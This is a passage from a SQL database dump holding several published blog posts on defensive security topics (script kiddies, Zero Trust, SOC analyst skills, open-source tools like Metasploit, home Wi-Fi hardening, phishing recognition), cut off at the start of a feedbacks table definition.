(24, 'How to Defend Your Organization Against Script Kiddies', 'how-to-defend-your-organization-against-script-kiddies', '# Understanding and Defending Against Script Kiddies\n\nCyber threats come in all shapes and sizes, but one often underestimated group of attackers is the script kiddies. Despite their seemingly amateur status, they can wreak havoc on businesses and organizations of all sizes. Understanding who script kiddies are and how they operate is crucial for IT professionals and security leaders looking to safeguard their infrastructures.\n\nThis blog will explore the psychology behind script kiddies, the tools they rely on, signs of an impending attack, and detailed strategies to defend your organization. By the end, you\'ll have a robust understanding of how to proactively secure your systems and educate your team to build a human firewall against this threat.\n\n## What Are Script Kiddies and Why Should You Care?\n\nScript kiddies, or \"skiddies,\" are novice hackers who rely on pre-written scripts or hacking tools created by professional hackers. They don’t always have deep technical knowledge but can still cause significant disruption. Unlike sophisticated threat actors, their motives often range from curiosity and thrill-seeking to bragging rights.\n\nWhile they may lack the technical intelligence of seasoned cybercriminals, script kiddies pose a real threat. They exploit known vulnerabilities in systems, causing data breaches, service interruptions, or defacement of web properties. For businesses, this can mean downtime, financial loss, and damage to reputation.\n\nRemember, while their methods might seem less advanced, underestimating them is a mistake. They\'re opportunistic and relentless, searching for any weak link in your organization.\n\n## Understanding the Script Kiddy Mindset\n\nUnderstanding the motivations and approach of script kiddies is key to defending against them. Here\'s what fuels their activities:\n\n- **Thrill and Ego Boost**: Many script kiddies hack for the excitement of breaking into a system or to show off to their peers.\n- **Bragging Rights**: Defacing a website or taking a service offline often serves as a \"badge of honor.\"\n- **Ease of Access**: With a wealth of hacking tools, forums, and guides available online, almost anyone with basic computer knowledge can launch an attack.\n- **Target Preference**: Script kiddies are opportunistic and often target low-hanging fruit—organizations with weak defenses are their ideal victims.\n\nBy understanding these behaviors, you’re already better equipped to anticipate and block their attempts.\n\n## Common Tools and Techniques Used by Script Kiddies\n\nBy knowing what tools they use, you can identify vulnerabilities in your system and preemptively close gaps. Here are some popular approaches and tools commonly employed by script kiddies:\n\n1. **Scanning Tools**: Script kiddies often use automated tools like **Nmap** to scan for vulnerabilities in networks.\n2. **Brute Force Attack Tools**: Tools such as Hydra or John the Ripper are used to crack passwords by trying combinations repeatedly.\n3. **Exploit Kits**: These are pre-packaged kits (like the Metasploit Framework) that allow users to exploit known vulnerabilities in software.\n4. **Denial of Service (DoS) Attacks**: With tools like LOIC (Low Orbit Ion Cannon), script kiddies can overwhelm a server, causing unexpected downtime.\n5. **Social Engineering & Phishing Kits**: They may attempt low-tech approaches like phishing, often relying on kits purchased from underground forums.\n\nRecognizing these tools can help security teams predict likely attack methods and shore up weak points.\n\n## Spotting the Signs of an Impending Script Kiddy Attack\n\nEarly detection is vital to stopping a script kiddy in their tracks. Here are some key signs to look for within your network or systems:\n\n- Increased network scanning activity on your firewalls or intrusion detection systems (IDS).\n- Repeated failed login attempts, signaling brute force attacks.\n- Suspicious spikes in traffic, especially targeted at specific endpoints, indicating a potential DoS attack.\n- Emails or messages directing employees to click unknown links or provide credentials (phishing).\n\nMonitoring these anomalies and having alert systems in place can give you an early edge.\n\n## Strengthening Your Defenses Against Script Kiddies\n\n**Proactive security measures** are your first line of defense. Here’s how to bolster your organization’s security posture:\n\n1. **Update and Patch Regularly**: Keep all software and hardware systems updated to close existing vulnerabilities.\n2. **Employ a Strong Firewall and IDS**: Filter out malicious traffic using advanced firewalls and monitor for unusual activity with intrusion detection systems.\n3. **Enforce Strong Password Policies**: Ensure employees use complex, unique passwords and implement multi-factor authentication (MFA) for added security.\n4. **Limit Administrative Access**: Only grant high-level permissions to those who truly need them to minimize damage should an account be compromised.\n5. **Conduct Regular Security Audits**: Regular vulnerability assessments will help identify weak spots before attackers exploit them.\n\nImplementing these steps can make your organization a less attractive target for opportunistic script kiddies.\n\n## Have a Response Plan for When Attacks Occur\n\nPreventive measures are essential, but having an incident response plan ensures your team is ready to act if an attack does occur. Here’s what an effective plan should include:\n\n- **Immediate Containment**: Disconnect impacted systems from the network to prevent further damage.\n- **Root Cause Analysis**: Investigate the entry point and methods used to strengthen defenses going forward.\n- **Communication Protocols**: Notify stakeholders, employees, or customers if their data or services are affected.\n- **Recovery and Evaluation**: Restore systems from clean backups and ensure the vulnerabilities exploited during the attack are patched.\n\nTesting and updating your incident response plan helps your organization stay prepared for real-world scenarios.', '', 'http://infoseclabs.io/uploads/1767838758067-532321751.png', 'Cybersecurity professional defending against script kiddie attacks', 1, 'published', '2026-01-07 21:18:00', '2026-01-08 05:19:21', 'Information Security', 'Defend Against Script Kiddies: Essential Strategies', 'Learn how to protect your organization from script kiddies with effective strategies and insights into their tactics.', 'script kiddies'),
(25, 'What is Zero Trust Security, and Why Does It Matter?', 'what-is-zero-trust-security-and-why-does-it-matter', '# Understanding the Shift to Zero Trust Security\n\nCyber threats are evolving at an unprecedented pace, with bad actors finding new ways to infiltrate even the most secure networks. To tackle this, organizations are shifting away from traditional perimeter-based defenses and adopting a more robust, modern approach to security known as **Zero Trust**.\n\nBut what exactly is Zero Trust Security, and why is it becoming the gold standard for protecting sensitive information? This blog will break down the core principles of Zero Trust, its benefits, and how your organization can implement it effectively to safeguard its data and operations.\n\n## What is Zero Trust Security?\n\nZero Trust Security is a cybersecurity model built on the principle of \"never trust, always verify.\" Unlike traditional models that assume everything inside the network is trustworthy, Zero Trust treats every user, device, and application as a potential threat until proven otherwise.\n\nThis approach is particularly crucial as businesses increasingly adopt remote work, cloud computing, and IoT devices, creating complex environments where traditional security measures can fall short. Zero Trust ensures that access to systems and data is tightly controlled and monitored, reducing the risk of breaches.\n\n### Why is Zero Trust Important?\n\nThe rise of sophisticated cyberattacks, like ransomware and supply chain breaches, highlights the need for a proactive security stance. According to IBM\'s Cost of a Data Breach Report 2023, the average cost of a data breach has reached a staggering $4.45 million. Zero Trust addresses these challenges by adapting to the modern threat landscape and focusing on the following priorities:\n\n- Securing remote workforces and cloud-based environments.\n- Protecting against insider threats.\n- Reducing the attack surface for cybercriminals.\n\n## Core Principles of Zero Trust Security\n\nTo adopt a Zero Trust framework, organizations must align with its core principles. Below, we explore the foundational tenets of this model.\n\n### 1. Least Privilege Access\n\nOne of the fundamental principles of Zero Trust is granting users and devices the minimum level of access required to perform their tasks. By limiting access, Zero Trust mitigates the damage caused by compromised accounts or insider threats. For example, an HR employee may have access to payroll systems but not operational controls for cloud servers.\n\n**Tip**: Implement role-based access control (RBAC) to manage permissions effectively.\n\n### 2. Verify, Don\'t Trust\n\nZero Trust requires continuous verification of all users and devices attempting to access resources, even if they are already inside the network. Authentication mechanisms such as multi-factor authentication (MFA) ensure users are who they claim to be.\n\n**Example**: Even if an employee accesses the corporate network through a VPN, they\'ll still need to verify their identity when accessing critical applications like CRM software.\n\n### 3. Microsegmentation\n\nMicrosegmentation involves dividing networks into smaller, secure zones to limit unauthorized access. Think of it as breaking your network into \"rooms,\" where only authorized users can enter specific areas. This drastically reduces an attacker\'s ability to move laterally within the system.\n\n**Use Case**: Finance databases and marketing data exist in separate network segments to ensure that even if one is compromised, the other remains unaffected.\n\n### 4. Assume Breach\n\nZero Trust operates under the assumption that breaches are inevitable. This paradigm shifts focus from breach prevention alone to rapid detection, containment, and recovery. Strategies like advanced threat detection and real-time monitoring support this principle.\n\n**Implementation Tip**: Use tools like Security Information and Event Management (SIEM) and Endpoint Detection and Response (EDR) for enhanced visibility and incident response.\n\n## Benefits of Zero Trust Security\n\nZero Trust is not just a buzzword — it delivers tangible benefits crucial for modern enterprises. Here’s how adopting Zero Trust can bolster your organization’s defenses:\n\n### 1. Reduces the Attack Surface\n\nBy requiring continuous verification and tightly controlling access, Zero Trust minimizes the number of vulnerable entry points for attackers. This is especially important for companies operating in distributed environments with remote employees and hybrid clouds.\n\n### 2. Improves Threat Detection\n\nWith real-time monitoring and analytics, Zero Trust systems can identify unusual patterns and potential threats more effectively. Instead of relying on perimeter defenses, it emphasizes visibility across every layer of the IT ecosystem.\n\n### 3. Protects Against Insider Threats\n\nInsider threats, whether intentional or accidental, remain a significant risk. By restricting access and enforcing granular controls, Zero Trust ensures that no single user has unchecked access.\n\n**Statistic**: According to a report by Verizon, 19% of breaches in 2023 involved insider threats. Zero Trust directly addresses this issue.\n\n### 4. Strengthens Regulatory Compliance\n\nRegulations such as GDPR, HIPAA, and CCPA demand strict data protection measures. Zero Trust frameworks simplify compliance by providing comprehensive activity logging, encryption, and access control measures.\n\n### 5. Enhances User Experience\n\nWhile Zero Trust may sound rigid, its use of technologies like Single Sign-On (SSO) and MFA balances security with user convenience. Employees can securely access the resources they need without constant disruptions.\n\n## A Simplified Roadmap to Zero Trust Implementation\n\nImplementing Zero Trust may seem overwhelming, but with a deliberate approach, businesses can reap its rewards. Here\'s a step-by-step roadmap to get started:\n\n### Step 1. Evaluate Your Current Security Posture\n\nBegin by assessing your existing security framework. Identify assets (data, systems, devices), potential vulnerabilities, and privileged access points. This step helps you understand where to focus your efforts.\n\n### Step 2. Adopt Identity and Access Management (IAM)\n\nDeploy tools like MFA, SSO, and user identity verification solutions. Establish RBAC to ensure each employee only has access to necessary applications and data.\n\n- **Tool Example**: Okta or Microsoft Azure AD for IAM implementation.\n\n### Step 3. Segment Your Network\n\nIntroduce microsegmentation to create secure network zones. Use firewalls, virtual LANs (VLANs), or cloud-native security tools to isolate sensitive data and systems.\n\n### Step 4. Enforce Continuous Monitoring and Analytics\n\nImplement monitoring tools that provide real-time insights and raise alerts in the presence of anomalies. Advanced analytics can proactively identify potential risks.\n\n- **Recommended Tools**: SIEM platforms like Splunk or IBM QRadar.\n\n### Step 5. Pilot and Iterate\n\nStart small by applying Zero Trust to a single department or system. Gather feedback, assess the results, and scale based on lessons learned.\n\n### Step 6. Educate and Communicate\n\nZero Trust is not a \"set-it-and-forget-it\" model. Continuous employee training and communication are necessary to sustain your framework’s effectiveness.\n\n## Securing the Future with Zero Trust\n\nThe cyber threat landscape is constantly evolving, and outdated security models can no longer keep pace. Zero Trust Security offers businesses and IT leaders a proactive, modern solution to safeguard data, users, and systems in today’s complex environments.', '', 'http://infoseclabs.io/uploads/1767841056902-416013144.png', 'Illustration of a secure digital network representing Zero Trust principles', 1, 'published', '2026-01-07 21:57:00', '2026-01-08 05:57:37', 'Information Security', 'Zero Trust Security: A New Standard in Cyber Defense', 'Discover why Zero Trust Security is essential for safeguarding data in today\'s complex cyber landscape.', 'Zero Trust Security'),
(26, 'Top 10 Things Every SOC Analyst Should Know Inside Out', 'top-10-things-every-soc-analyst-should-know-inside-out', '# The Essential Skills for a SOC Analyst\n\nThe role of a Security Operations Center (SOC) Analyst demands vigilance, adaptability, and expertise. A SOC Analyst is the frontline defender in an organization\'s cybersecurity, tasked with monitoring, analyzing, and responding to potential threats before they escalate. What sets an exceptional SOC Analyst apart from a proficient one is a blend of core cybersecurity knowledge and practical, hands-on skills.\n\nWhether you\'re just starting your cybersecurity career or looking to deepen your expertise, this guide outlines the top 10 things every SOC Analyst should know. These essentials form the foundation of defending against cyberattacks and navigating the complex digital threat landscape.\n\n## 1. Master Networking Fundamentals\n\nA sound understanding of network operations is crucial for effectively detecting and mitigating cyber threats. SOC Analysts should have in-depth knowledge of foundational networking concepts, including:\n\n- **TCP/IP Protocol Suite**: Understanding IP addressing, packets, and how data moves across networks.\n- **OSI Model**: Knowing the seven layers of networking (physical, data link, network, transport, session, presentation, application) to identify vulnerabilities and pinpoint network issues.\n- **Subnetting**: Recognizing how subnetting divides large networks into smaller segments to enhance security and efficiency.\n- **Common Ports and Protocols**: Recognizing unusual use of ports (e.g., HTTP on port 80, HTTPS on port 443, FTP on port 21) can signal potential breaches.\n\nThis knowledge allows analysts to uncover anomalies in their environments while confidently troubleshooting network issues.\n\n## 2. Understand Security Principles\n\nTo effectively secure systems, an analyst must grasp fundamental security principles. These key concepts underpin almost every cybersecurity framework used today:\n\n- **CIA Triad (Confidentiality, Integrity, Availability)**: A guide to balancing data protection, ensuring that sensitive information is only accessible by authorized individuals (confidentiality), not tampered with (integrity), and available (availability) when needed.\n- **Least Privilege**: Ensuring users and systems only have access to what\'s strictly necessary to perform their functions.\n- **Defense in Depth**: A multi-layered security strategy where multiple measures protect a system. Even if one layer fails, others continue to provide protection.\n\nThese principles create the groundwork for strong security practices.\n\n## 3. Know Common Attack Vectors\n\nUnderstanding how attackers infiltrate systems helps SOC Analysts effectively detect and respond to threats. Familiarize yourself with these common attack methods:\n\n- **Malware (e.g., viruses, ransomware, Trojans, worms)**: Software designed to disrupt, damage, or gain unauthorized access to systems.\n- **Phishing**: One of the most prevalent attacks, where users are tricked into revealing sensitive information or clicking malicious links.\n- **Distributed Denial of Service (DDoS)**: Attacks that overwhelm systems and networks to disrupt services.\n- **SQL Injection**: Exploiting vulnerabilities in database queries to gain unauthorized access to data.\n\nKnowing how these attacks work and recognizing their signs equips SOC Analysts to act swiftly and decisively.\n\n## 4. Get Comfortable with Security Tools\n\nSOC Analysts rely heavily on security tools to detect, analyze, and report incidents. To excel, be proficient in these key categories of tools:\n\n- **SIEM (Security Information and Event Management) Systems**: Tools like Splunk, IBM QRadar, or Elastic stack for analyzing events across the IT infrastructure.\n- **IDS/IPS (Intrusion Detection/Prevention Systems)**: Tools such as Snort or Zeek to identify and prevent suspicious activity.\n- **Firewalls**: Important for perimeter monitoring—SOCs often need to understand configuration rules and logs.\n- **Endpoint Detection and Response (EDR)**: Tools like CrowdStrike or Carbon Black that focus on endpoint security.\n\nHands-on experience is invaluable. Most employers will value proficiency in at least one tool in these categories.\n\n## 5. Master Log Analysis\n\nSOC Analysts process vast amounts of data daily, so the ability to analyze logs for security incidents is crucial. Logs are recorded across practically every network entity—firewalls, servers, routers—and contain vital clues about suspicious activity. Analysts should be able to:\n\n- Recognize patterns of malicious behavior across logs.\n- Filter and correlate data from multiple sources using SIEM systems.\n- Look out for anomalies like unusual login attempts or unauthorized file access.\n\nDeveloping sharp log analysis skills ensures no potential incident escapes detection.\n\n## 6. Understand Incident Response\n\nSOC Analysts play a critical role in the incident response lifecycle. Familiarity with these key steps provides structure in high-pressure situations:\n\n1. **Identification**: Recognize and verify the security incident.\n2. **Containment**: Isolate the affected systems to stop further damage.\n3. **Eradication**: Remove malicious entities from the network.\n4. **Recovery**: Restore systems and normal business functions without recurring vulnerabilities.\n5. **Post-Incident Analysis**: Document the event thoroughly and improve systems to prevent recurrence.\n\nSticking to a structured incident response plan minimizes downtime and improves organizational resilience.\n\n## 7. Grasp Threat Intelligence\n\nThreat intelligence gives SOC Analysts a proactive edge by helping them understand the broader cyber threat landscape. Analysts should focus on:\n\n- **Threat Actors**: Understanding who might target their company (e.g., nation-states, hacktivists, or insider threats).\n- **Tactics, Techniques, and Procedures (TTPs)**: Used by cybercriminals.\n- Tracking global or industry-specific emerging threats.\n\nUsing data from platforms like MITRE ATT&CK, VirusTotal, or Recorded Future will help your organization understand and prepare for potential risks.\n\n## 8. Stay Compliant with Regulations\n\nSOC Analysts must also align with compliance frameworks and regulations that secure data and protect privacy. Familiarize yourself with:\n\n- **GDPR**: For privacy compliance in Europe.\n- **HIPAA**: For handling healthcare data.', '', 'http://infoseclabs.io/uploads/1767909003079-180527002.png', 'SOC Analyst monitoring cybersecurity threats on computer screens', 1, 'published', '2026-01-08 16:49:00', '2026-01-09 00:50:08', 'Information Security', '10 Essentials Every SOC Analyst Must Know', 'Discover the top 10 skills every SOC Analyst needs to excel in cybersecurity defense.', 'SOC Analyst'),
(27, 'Exploring Open Source Tools for Cybersecurity Professionals', 'exploring-open-source-tools-for-cybersecurity-professionals', '# The Dynamic World of Cybersecurity Tools\n\nThe cybersecurity landscape is dynamic, challenging, and undeniably vital in today’s technology-driven world. Whether you\'re an aspiring SOC analyst, a network administrator, or someone interested in safeguarding digital assets, having the right tools at your disposal is critical. This is where open-source cybersecurity tools shine.\n\nThese tools are not just cost-effective but community-driven, continuously evolving, and highly customizable. From analyzing your network traffic to identifying vulnerabilities and monitoring potential threats, open-source tools are integral to ensuring robust cybersecurity. This blog explores three essential tools—Wireshark, Metasploit, and Snort—that every cybersecurity professional, beginner, or enthusiast should know about.\n\n## What Are Open Source Cybersecurity Tools?\n\nOpen-source cybersecurity tools are software programs with their source code made freely available to the public. This allows users to access, modify, and distribute the software in line with their specific needs.\n\n### Benefits of Open Source Tools:\n\n- **Cost-efficiency**: They’re generally free, making them accessible to anyone, including students and small organizations.\n- **Community Support**: Contributions from worldwide cybersecurity experts enhance features and fix vulnerabilities quickly.\n- **Customizability**: Users can tailor these tools to meet their unique cybersecurity requirements.\n\nFor cybersecurity roles, ranging from penetration testing to network administration, these tools offer the flexibility and power to perform critical tasks efficiently. Now, let\'s dig deep into three open-source giants in the cybersecurity space.\n\n## Wireshark: The Go-To Tool for Network Analysis\n\nWireshark is one of the most widely used open-source tools for network protocol analysis. Its comprehensive set of features allows users to capture, inspect, and analyze network traffic in real-time. Whether you’re troubleshooting network issues or detecting malicious activity, Wireshark can give you the insights you need.\n\n### Capabilities of Wireshark\n\n- Captures and inspects data packets across a network.\n- Identifies unusual spikes or suspicious traffic for further analysis.\n- Deciphers protocols and displays data in human-readable formats.\n- Offers filters to zero in on specific traffic (e.g., filtering by IP addresses or specific protocols).\n\n### How to Use Wireshark\n\n1. **Download and Install**:  \n   Visit the [official Wireshark website](https://www.wireshark.org/) to download the software for your operating system.\n\n2. **Capture Network Traffic**:  \n   Open Wireshark and choose the appropriate network interface (e.g., Wi-Fi, Ethernet). Click \"Start\" to begin capturing live data.\n\n3. **Apply Filters**:  \n   Use Wireshark’s powerful filters to narrow down your results. For example:\n   - `http` filters for HTTP traffic.\n   - `ip.src == [IP]` filters for packets originating from a specific IP address.\n\n4. **Analyze Data Packets**:  \n   Inspect individual packets for payloads, source/destination addresses, or protocol details.\n\n### Practical Use Cases\n\n- Troubleshooting network performance issues.\n- Identifying unauthorized devices on a network.\n- Detecting potential data breaches or malware communications.\n\nWireshark is invaluable for maintaining network transparency and spotting anomalies.\n\n## Metasploit: The Ultimate Penetration Testing Framework\n\nIf Wireshark is for monitoring, Metasploit is for offense. Metasploit is an open-source penetration testing framework that allows cybersecurity professionals to test system vulnerabilities by simulating cyberattacks in controlled environments.\n\n### Introduction to Metasploit\n\nMetasploit combines a massive library of exploits, payloads, and auxiliary tools to test the resilience of various systems against attacks. It’s widely used by ethical hackers to identify vulnerabilities before malicious actors exploit them.\n\n### Steps to Perform Vulnerability Testing with Metasploit\n\n1. **Setup and Installation**:  \n   Download Metasploit from the [Rapid7 website](https://www.metasploit.com/). It supports Linux, Windows, and macOS.\n\n2. **Select a Target**:  \n   Identify the system or service you want to test and gather its IP address or hostname.\n\n3. **Choose an Exploit**:  \n   Look for known vulnerabilities in Metasploit\'s database (use the `search [vulnerability]` command).\n\n4. **Test with a Payload**:  \n   Select a payload (e.g., reverse shell) and configure the parameters.\n\n5. **Execute Test**:  \n   Launch your simulated attack responsibly within a controlled setup.\n\n### Executors Beware! Use Metasploit Safely\n\n- Only use Metasploit in test environments or on systems you are authorized to test.\n- Always notify relevant stakeholders if you’re testing workplace systems.\n\nEthical hacking with Metasploit enables you to patch vulnerabilities before attackers can exploit them.\n\n## Snort: Your Intrusion Detection and Prevention Ally\n\nSnort, authored by Cisco Talos, is a popular open-source intrusion detection system (IDS) and intrusion prevention system (IPS). \n\n--- \n\nBy understanding and utilizing these open-source tools, you can significantly enhance your cybersecurity posture, whether you are monitoring network traffic, testing vulnerabilities, or preventing intrusions.', '', 'http://infoseclabs.io/uploads/1767909071893-784433651.jpg', 'Cybersecurity tools concept with digital security icons', 1, 'published', '2025-12-25 08:51:00', '2026-01-09 00:52:20', 'Information Security', 'Top Open Source Tools for Cybersecurity Experts', 'Discover the best open-source tools like Wireshark, Metasploit, and Snort for effective cybersecurity management.', 'Open Source Cybersecurity'),
(28, 'Secure Your Wi-Fi: Tips for a Stronger Network at Home', 'secure-your-wi-fi-tips-for-a-stronger-network-at-home', '# Securing Your Home Wi-Fi Network\n\nYour home Wi-Fi network is more than just an internet connection—it\'s the gateway to personal data, banking details, smart home devices, and much more. With the rise in cybersecurity threats, leaving your Wi-Fi network unprotected is like leaving your front door wide open. This guide will walk you through steps to secure your Wi-Fi and ensure that your network, and everything connected to it, stays safe from prying eyes.\n\nWhether you\'re an IT professional or someone simply looking to secure their home, these tips will help you create a stronger, safer network.\n\n## Understanding Wi-Fi Security Protocols\n\nWhen setting up your Wi-Fi, you\'ll encounter different security protocols. Understanding these is crucial for making informed decisions about your network\'s protection.\n\n- **WEP (Wired Equivalent Privacy)** – Outdated and highly vulnerable to attacks. Avoid this protocol.\n- **WPA (Wi-Fi Protected Access)** – A significant improvement over WEP, but now considered obsolete.\n- **WPA2** – Widely used and more secure than WPA. It\'s a good standard but not foolproof anymore.\n- **WPA3** – The most secure protocol currently available. If your router supports this, make sure to enable it.\n\n**Pro tip**: Always opt for WPA3 if it’s supported by your router and devices. If not, WPA2 should be your fallback.\n\n## Setting a Strong Password\n\nA weak Wi-Fi password is an open invitation to hackers. Here’s how to create a password that’s tough to crack but easy for you to remember:\n\n- Use at least 12 characters.\n- Combine uppercase and lowercase letters, numbers, and special characters.\n- Avoid using common words, names, or birthdates.\n- Use a passphrase, like \"My$SecureWi-Fi123\", that’s unique but memorable.\n\n**Pro tip**: Try a password manager to generate and store strong passwords securely.\n\n## Enabling Network Encryption\n\nEncryption scrambles your data, making it unreadable to unauthorized users. Most modern routers support encryption protocols like WPA2 or WPA3.\n\n### Step-by-step guide:\n\n1. Log in to your router’s admin panel (usually via a browser—check your router’s manual).\n2. Locate the wireless security settings.\n3. Select WPA3 (or WPA2 if WPA3 isn’t available).\n4. Save and reboot your router to apply changes.\n\n## Regularly Updating Firmware\n\nYour router’s firmware is essentially its operating system. Manufacturers frequently release updates to fix bugs and patch security vulnerabilities.\n\n1. Log in to your router’s admin panel.\n2. Check for a firmware update option (often found under “System” or “Settings”).\n3. Download and install updates as they become available.\n\n**Pro tip**: Some routers have auto-update features—enable this if it’s available.\n\n## Enabling Firewall Protection\n\nA firewall adds an additional layer of defense by monitoring and blocking malicious traffic. Many modern routers come with a built-in firewall, but it’s often disabled by default.\n\n- Log into your router’s admin settings and activate the firewall.\n- For advanced users, configure custom rules to enhance protection further.\n\n## Disabling WPS\n\nWi-Fi Protected Setup (WPS) was designed for convenience but is now recognized as a security vulnerability. Hackers can exploit WPS to gain unauthorized access.\n\nTo disable it:\n\n1. Go to the admin panel of your router.\n2. Find the WPS settings under “Wireless” or “Advanced settings.”\n3. Turn it off.\n\n## Changing the Default SSID\n\nThe default Service Set Identifier (SSID) is usually the brand name of your router, which makes it easier for attackers to identify and exploit its vulnerabilities.\n\n- Rename your network to something unique and unrelated to your name or address.\n- Avoid using personal information like your last name in the SSID.\n\n**Pro tip**: A generic name like “CoffeeHouse_Network” works well to obscure your identity.\n\n## Implementing MAC Address Filtering\n\nEvery device that connects to your network has a unique MAC address. By enabling MAC address filtering, you can control which devices are allowed to connect.\n\n1. Log in to your router’s admin panel and look for “MAC Filtering” under wireless or security settings.\n2. Add the MAC addresses of your trusted devices to the whitelist.\n\n**Note**: This method isn’t foolproof, as advanced hackers can spoof MAC addresses, but it adds an extra layer of defense.\n\n## Monitoring Connected Devices\n\nKeeping track of who is on your network helps you detect any unauthorized access.\n\n- Use your router’s admin panel to view a list of connected devices.\n- Regularly check for names or MAC addresses you don’t recognize.\n- Kick off intruders and change your Wi-Fi password if necessary.\n\n## Using a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic and masks your IP address, adding extra protection against hackers.\n\n- Install a VPN on your router to secure every device connected to your network.\n- Alternatively, install a VPN on individual devices for more flexibility.\n\n## Setting Up a Guest Network\n\nAllowing visitors to connect to your main Wi-Fi puts your entire network at risk. Instead, create a guest network with limited access.\n\n1. Open your router’s settings.\n2. Look for “Guest Network” under wireless options.\n3. Assign a separate SSID and password for guests.\n\nThis keeps your main network safe while providing your visitors with internet access.', '', 'http://infoseclabs.io/uploads/1767909243749-760907848.png', 'Home Wi-Fi network security with router and firewall protection', 1, 'published', '2026-01-08 08:54:00', '2026-01-09 00:54:29', 'Information Security', 'Secure Your Wi-Fi: Tips for a Stronger Network', 'Learn essential tips to secure your home Wi-Fi network and protect personal data from cyber threats.', 'Wi-Fi security'),
(29, 'Anatomy of a Phishing Attack: How to Recognize the Signs', 'anatomy-of-a-phishing-attack-how-to-recognize-the-signs', '# Understanding Phishing Attacks: A Comprehensive Guide\n\nPhishing attacks are among the most common cybersecurity threats affecting businesses today. Whether it\'s a cleverly disguised email or a fraudulent website, phishing can result in financial loss, stolen data, and compromised systems. Yet, despite its prevalence, many small business owners and professionals remain unsure about how to identify and defend against these attacks.\n\nThis blog will guide you through the ins and outs of phishing campaigns. We\'ll cover the various types of phishing attacks, key signs to watch out for, real-world examples, and actionable steps to protect your business. By the end, you\'ll have the knowledge and tools to stay a step ahead of cybercriminals.\n\n## What Are Phishing Attacks?\n\nPhishing is a type of cyberattack where hackers pose as legitimate entities to trick victims into providing sensitive information, such as passwords, credit card numbers, or company data. These attacks are often carried out via fake emails, websites, or messages designed to appear highly authentic, making them difficult to spot.\n\nPhishing is the foundation of many larger cybercrimes, from ransomware attacks to financial fraud, making it essential for businesses to understand and mitigate these risks.\n\n### Why Are Small Businesses and Startups at Risk?\n\nSmaller businesses may not have the extensive cybersecurity measures that larger enterprises often possess, making them attractive targets for hackers. Entrepreneurs and IT professionals managing growing organizations are often juggling multiple priorities, increasing the likelihood of an attack slipping through unnoticed.\n\nUnderstanding phishing on a deeper level is the first step in fortifying your operations.\n\n## Common Types of Phishing Attacks\n\nPhishing tactics come in several forms, each tailored to exploit different types of vulnerabilities. Here’s a breakdown:\n\n### 1. Email Phishing\n\nThe most common form, email phishing, involves attackers sending messages that appear to come from trusted sources. These emails often include urgent calls to action, like \"Your account will be locked in 24 hours. Click here to reset your password.\"\n\n### 2. Spear Phishing\n\nUnlike generic phishing, spear phishing targets specific individuals or companies. Attackers often do their homework, researching their victim\'s job title and organization to craft personalized messages that feel legitimate.\n\n### 3. Clone Phishing\n\nThis involves creating a nearly identical copy of a legitimate email that the recipient has already received. By adding malicious links or attachments, attackers can exploit the trust the recipient places in the sender.\n\n### 4. Vishing (Voice Phishing)\n\nPhishing isn\'t limited to the digital space. Vishing uses phone calls to trick people into revealing sensitive information, often posing as a bank or tech support.\n\n### 5. Smishing (SMS Phishing)\n\nSimilar to email attacks, smishing occurs through text messages. These usually contain a malicious link, urging users to act quickly.\n\n### 6. Pharming\n\nPharming redirects users from a legitimate website to a fraudulent one, often by exploiting DNS servers. Once on the fake site, users unwittingly input critical data.\n\nUnderstanding these forms allows you to better anticipate and defend against phishing tactics.\n\n## Key Signs of a Phishing Email\n\nPhishing emails often appear legitimate, but close inspection can reveal inconsistencies. Here are key signs to look out for:\n\n1. **Suspicious Sender Addresses**  \n   Legitimate companies always use official email domains. Watch out for subtle misspellings like “@paypa1.com” instead of “@paypal.com.”\n\n2. **Urgency or Fear-Based Subject Lines**  \n   Attackers create a sense of panic to compel immediate action, such as “Your bank account has been compromised!”\n\n3. **Generic Greetings**  \n   Phishing emails often use vague greetings like “Dear customer” instead of your name.\n\n4. **Unexpected Attachments**  \n   Legitimate sources are unlikely to send attachments you didn’t request. Malicious attachments can infect your system with malware.\n\n5. **Links with Mismatched URLs**  \n   Hover over any links before clicking. A mismatch between the text and URL is a major red flag.\n\nThe devil is in the details when it comes to phishing, so slow down and review suspicious emails carefully.\n\n## Technical Indicators to Watch Out For\n\nBeyond visual cues, phishing emails often contain technical abnormalities:\n\n- **Misspelled URLs:** Check for slight deviations in trusted web addresses.\n- **Lack of HTTPS Security:** Legitimate companies use secure “https://” websites, especially for transactions.\n- **Unusual Metadata:** Analyzing an email’s header or source code can sometimes reveal forgery.\n\nTools that flag these issues, such as URL checkers or email filters, can help identify phishing attempts before the damage is done.\n\n## Real-World Phishing Case Studies\n\n### Case Study 1: The Google and Facebook Scam\n\nAttackers successfully scammed Google and Facebook out of over $100 million by posing as a legitimate vendor through fake invoices. Both companies fell for the trap and paid the fraudulent bills, showing that even tech giants aren’t immune.\n\n### Case Study 2: The Target Data Breach\n\nHackers gained access to Target\'s systems by spear phishing an HVAC subcontractor. The breach compromised 40 million customer credit card details and cost Target millions in lawsuits.\n\nThese real-world examples highlight the effectiveness of phishing and the critical need for preventative measures.\n\n## Steps to Take If You Suspect a Phishing Attempt\n\nIf you suspect an email or message is a phishing attempt, here’s what to do:\n\n1. **Don’t Click Links or Download Attachments:**  \n   Avoid engaging with suspected phishing content.\n\n2. **Verify the Sender:**  \n   Contact the company directly using official channels to confirm legitimacy.\n\n3. **Report the Email:**  \n   Most email providers allow you to flag suspicious emails as “phishing.”\n\n4. **Update Passwords:**  \n   If you’ve interacted with a phishing scam, immediately change affected passwords.\n\nHaving clear protocols for suspected phishing attempts can mitigate damage quickly.\n\n## Tools and Technologies to Protect Against Phishing\n\nLeveraging technology is critical in staying ahead of phishing threats. Consider using:\n\n1. **Email Security Software:**  \n   Tools like Mimecast and Proofpoint identify and filter phishing content.\n\n2. **Web Filtering Tools:**  \n   Prevent access to malicious websites with tools like OpenDNS.', '', 'http://infoseclabs.io/uploads/1767909305235-538274400.png', 'Illustration of a deceptive phishing email targeting a business', 1, 'published', '2026-01-08 16:55:00', '2026-01-09 00:55:55', NULL, 'Recognizing Phishing Attacks: Key Signs & Protection', 'Learn to recognize phishing attacks and protect your business from common cybersecurity threats with this comprehensive guide.', 'Phishing Attacks');

-- --------------------------------------------------------

--
-- Table structure for table `feedbacks`
--

DROP TABLE IF EXISTS `feedbacks`;
CREATE TABLE `feedbacks` (
  `id` int(11) NOT NULL,
  `user_id` int(11) DEFAULT NULL,
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `created_at` datetime DEFAULT current_timestamp(),
